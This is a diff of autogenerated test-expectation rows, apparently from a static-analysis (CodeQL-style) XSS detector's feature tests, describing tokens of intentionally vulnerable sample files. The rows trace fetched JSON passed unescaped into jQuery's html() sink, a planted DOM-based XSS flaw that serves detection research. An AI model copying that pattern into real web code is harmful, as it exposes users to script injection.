json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | return of anonymous function | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:18:19:24:1 | return of anonymous function | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:13 | got | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:13 | got | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:13 | got | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:13 | got | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:13 | got | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:30 | got | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:30 | got | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:30 | got | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:30 | got | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:30 | got | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:30 | got = require('got') | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:30 | got = require('got') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:30 | got = require('got') | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:30 | got = require('got') | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:11:19:30 | got = require('got') | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:23 | require | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:23 | require | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:23 | require | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:23 | require | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:23 | require | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:30 | exceptional return of require('got') | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:30 | exceptional return of require('got') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:30 | exceptional return of require('got') | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:30 | exceptional return of require('got') | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:30 | exceptional return of require('got') | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:30 | require('got') | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:30 | require('got') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:30 | require('got') | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:30 | require('got') | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:19:17:19:30 | require('got') | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:19:25:19:29 | 'got' | CalleeFlexibleAccessPath | require | | autogenerated/Xss/DomBasedXss/xmlRequest.js:19:25:19:29 | 'got' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:19:25:19:29 | 'got' | contextFunctionInterfaces | onreadystatechange() | @@ -18630,6 +126800,51 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/xmlRequest.js:19:25:19:29 | 'got' | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | | autogenerated/Xss/DomBasedXss/xmlRequest.js:19:25:19:29 | 'got' | enclosingFunctionName | ready#functionalargument | | autogenerated/Xss/DomBasedXss/xmlRequest.js:19:25:19:29 | 'got' | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:14 | resp | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:14 | resp | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:14 | resp | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:14 | resp | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:14 | resp | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:48 | resp | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:48 | resp | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:48 | resp | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:48 | resp | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:48 | resp | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:48 | resp = ... rl }}") | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:48 | resp = ... rl }}") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:48 | resp = ... rl }}") | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:48 | resp = ... rl }}") | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:11:20:48 | resp = ... rl }}") | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:18:20:48 | await g ... rl }}") | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:18:20:48 | await g ... rl }}") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:18:20:48 | await g ... rl }}") | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:18:20:48 | await g ... rl }}") | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:18:20:48 | await g ... rl }}") | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:26 | got | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:26 | got | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:26 | got | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:26 | got | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:26 | got | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:30 | got.get | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:30 | got.get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:30 | got.get | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:30 | got.get | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:30 | got.get | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:48 | exceptional return of got.get ... rl }}") | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:48 | exceptional return of got.get ... rl }}") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:48 | exceptional return of got.get ... rl }}") | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:48 | exceptional return of got.get ... rl }}") | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:48 | exceptional return of got.get ... rl }}") | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:48 | got.get ... rl }}") | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:48 | got.get ... rl }}") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:48 | got.get ... rl }}") | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:48 | got.get ... rl }}") | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:24:20:48 | got.get ... rl }}") | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:28:20:30 | get | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:28:20:30 | get | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:28:20:30 | get | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:28:20:30 | get | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:20:28:20:30 | get | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:20:32:20:47 | "{{ some_url }}" | CalleeFlexibleAccessPath | got.get | | autogenerated/Xss/DomBasedXss/xmlRequest.js:20:32:20:47 | "{{ some_url }}" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:20:32:20:47 | "{{ some_url }}" | calleeImports | got | @@ -18639,6 +126854,51 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/xmlRequest.js:20:32:20:47 | "{{ some_url }}" | enclosingFunctionName | ready#functionalargument | | autogenerated/Xss/DomBasedXss/xmlRequest.js:20:32:20:47 | "{{ some_url }}" | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:20:32:20:47 | "{{ some_url }}" | receiverName | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:14 | json | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:14 | json | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:14 | json | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:14 | json | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:14 | json | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:38 | json | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:38 | json | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:38 | json | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:38 | json | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:38 | json | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:38 | json = ... p.body) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:38 | json = ... p.body) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:38 | json = ... p.body) | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:38 | json = ... p.body) | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:11:21:38 | json = ... p.body) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:21 | JSON | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:21 | JSON | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:21 | JSON | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:21 | JSON | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:21 | JSON | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:27 | JSON.parse | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:27 | JSON.parse | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:27 | JSON.parse | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:27 | JSON.parse | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:27 | JSON.parse | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:38 | JSON.pa ... p.body) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:38 | JSON.pa ... p.body) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:38 | JSON.pa ... p.body) | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:38 | JSON.pa ... p.body) | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:38 | JSON.pa ... p.body) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:38 | exceptional return of JSON.pa ... p.body) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:38 | exceptional return of JSON.pa ... p.body) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:38 | exceptional return of JSON.pa ... p.body) | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:38 | exceptional return of JSON.pa ... p.body) | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:18:21:38 | exceptional return of JSON.pa ... p.body) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:23:21:27 | parse | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:23:21:27 | parse | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:23:21:27 | parse | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:23:21:27 | parse | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:23:21:27 | parse | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:29:21:32 | resp | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:29:21:32 | resp | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:29:21:32 | resp | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:29:21:32 | resp | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:29:21:32 | resp | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:21:29:21:37 | resp.body | CalleeFlexibleAccessPath | JSON.parse | | autogenerated/Xss/DomBasedXss/xmlRequest.js:21:29:21:37 | resp.body | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:21:29:21:37 | resp.body | contextFunctionInterfaces | onreadystatechange() | @@ -18647,6 +126907,41 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/xmlRequest.js:21:29:21:37 | resp.body | enclosingFunctionName | ready#functionalargument | | autogenerated/Xss/DomBasedXss/xmlRequest.js:21:29:21:37 | resp.body | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:21:29:21:37 | resp.body | receiverName | JSON | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:34:21:37 | body | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:34:21:37 | body | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:34:21:37 | body | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:34:21:37 | body | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:21:34:21:37 | body | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:5 | $ | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:5 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:5 | $ | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:5 | $ | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:5 | $ | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:17 | $("#myThing") | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:17 | $("#myThing") | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:17 | $("#myThing") | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:17 | $("#myThing") | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:17 | $("#myThing") | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:17 | exceptional return of $("#myThing") | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:17 | exceptional return of $("#myThing") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:17 | exceptional return of $("#myThing") | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:17 | exceptional return of $("#myThing") | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:17 | exceptional return of $("#myThing") | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:22 | $("#myThing").html | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:22 | $("#myThing").html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:22 | $("#myThing").html | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:22 | $("#myThing").html | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:22 | $("#myThing").html | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:36 | $("#myT ... essage) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:36 | $("#myT ... essage) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:36 | $("#myT ... essage) | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:36 | $("#myT ... essage) | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:36 | $("#myT ... essage) | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:36 | exceptional return of $("#myT ... essage) | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:36 | exceptional return of $("#myT ... essage) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:36 | exceptional return of $("#myT ... essage) | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:36 | exceptional return of $("#myT ... essage) | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:5:22:36 | exceptional return of $("#myT ... essage) | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:22:7:22:16 | "#myThing" | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/xmlRequest.js:22:7:22:16 | "#myThing" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:22:7:22:16 | "#myThing" | contextFunctionInterfaces | onreadystatechange() | @@ -18654,6 +126949,16 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/xmlRequest.js:22:7:22:16 | "#myThing" | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | | autogenerated/Xss/DomBasedXss/xmlRequest.js:22:7:22:16 | "#myThing" | enclosingFunctionName | ready#functionalargument | | autogenerated/Xss/DomBasedXss/xmlRequest.js:22:7:22:16 | "#myThing" | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:19:22:22 | html | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:19:22:22 | html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:19:22:22 | html | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:19:22:22 | html | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:19:22:22 | html | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:24:22:27 | json | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:24:22:27 | json | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:24:22:27 | json | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:24:22:27 | json | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:24:22:27 | json | fileImports | got | | autogenerated/Xss/DomBasedXss/xmlRequest.js:22:24:22:35 | json.message | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/xmlRequest.js:22:24:22:35 | json.message | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/xmlRequest.js:22:24:22:35 | json.message | contextFunctionInterfaces | onreadystatechange() | @@ -18661,6 +126966,105 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/xmlRequest.js:22:24:22:35 | json.message | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | | autogenerated/Xss/DomBasedXss/xmlRequest.js:22:24:22:35 | json.message | enclosingFunctionName | ready#functionalargument | | autogenerated/Xss/DomBasedXss/xmlRequest.js:22:24:22:35 | json.message | fileImports | got | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:29:22:35 | message | contextFunctionInterfaces | onreadystatechange() | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:29:22:35 | message | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:29:22:35 | message | enclosingFunctionBody | got require got resp got get {{ some_url }} json JSON parse resp body $ #myThing html json message | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:29:22:35 | message | enclosingFunctionName | ready#functionalargument | +| autogenerated/Xss/DomBasedXss/xmlRequest.js:22:29:22:35 | message | fileImports | got | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:0 | this | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:1 | ajv | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:1 | ajv | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:1 | ajv | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:1 | joiSchema | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:1 | joiSchema | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:1 | joiSchema | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:1 | require | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:30 | import ... press'; | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:30 | import ... press'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:1:1:30 | import ... press'; | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:1:8:1:14 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:8:1:14 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:8:1:14 | express | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:8:1:14 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:8:1:14 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:8:1:14 | express | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:8:1:14 | express | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:1:8:1:14 | express | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:1:8:1:14 | express | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:1:21:1:29 | 'express' | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:21:1:29 | 'express' | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:1:21:1:29 | 'express' | fileImports | ajv express joi | +| autogenerated/Xss/ExceptionXss/ajv.js:2:1:2:22 | import ... 'ajv'; | contextFunctionInterfaces | | +| autogenerated/Xss/ExceptionXss/ajv.js:2:1:2:22 | import ... 'ajv'; | contextSurroundingFunctionParameters | | +| autogenerated/Xss/ExceptionXss/ajv.js:2:1:2:22 | import ... 'ajv'; | fileImports | ajv express joi | +| 